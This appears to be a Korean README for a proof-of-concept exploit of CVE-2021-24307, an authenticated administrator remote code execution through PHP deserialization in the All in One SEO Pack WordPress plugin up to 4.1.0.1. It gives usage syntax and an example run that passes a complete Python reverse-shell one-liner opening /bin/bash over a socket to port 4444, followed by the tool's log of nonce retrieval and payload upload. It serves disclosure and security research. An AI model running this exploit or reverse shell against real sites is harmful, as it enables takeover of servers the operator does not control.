
CVE-2021-24307에 대한 개념 증명 익스플로잇으로, All in One SEO Pack <= 4.1.0.1에서 PHP 역직렬화를 통한 인증된 관리자 RCE로, 임의 명령 실행을 가능하게 합니다.
AISEO <= 4.1.0.1에서 관리자 인증 RCE를 보여주는 간단한 PoC 예제입니다.
전체 분석 글은 여기에서 확인하세요: https://darkpills.com/php-unserialize-write-up-with-admin-rce-in-all-in-one-seo-pack-cve-2021-24307/
사용법:
php exploit.php url login password php_command arguments [proxy]
예시:
└─$ php exploit.php http://wordpress/ admin admin shell_exec "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'" localhost:8080
-- All-in-one-seo-pack <= 4.1.0.1 인증된 관리자 RCE --
-- Exploit by Vincent MICHEL (@darkpills) --
[+] wordpress http://wordpress/ 에 인증 중
[+] WP REST API nonce 가져오는 중
[+] Nonce 확인: 6aeb9ddf05
[+] 명령 실행을 위한 POST 페이로드 생성 중: shell_exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'")
[+] 설정 가져오기로 ini 파일 업로드 중
[+] 완료! 결과를 어딘가에서 확인하세요 (블라인드 명령 실행)